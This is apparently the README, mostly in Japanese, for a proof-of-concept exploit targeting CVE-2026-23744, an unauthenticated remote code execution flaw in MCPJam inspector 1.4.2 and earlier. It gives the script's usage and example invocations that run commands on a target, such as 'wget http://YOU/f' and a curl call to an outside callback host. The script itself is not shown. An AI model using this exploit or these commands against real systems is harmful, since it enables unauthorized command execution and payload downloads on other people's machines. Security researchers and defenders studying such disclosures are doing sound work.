
CVE-2026-23744の概念実証エクスプロイト。MCPJam inspector <= 1.4.2における認証不要のリモートコード実行であり、脆弱なターゲット上でのコマンド実行を可能にします。
CVE-2026-23744
MCPJam inspector <= 1.4.2 におけるRCE
https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6
usage: mcpjaminspector-unauth-rce.py [-h] --target TARGET --command COMMAND
options:
-h, --help show this help message and exit
--target TARGET Target e.g https://127.0.0.1
--command COMMAND Command to exec on remote target. e.g: wget http://YOU/f
python3 mcpjaminspector-unauth-rce.py --target "http://mymcp.local/" --command "curl http://myinteractsh.local/test"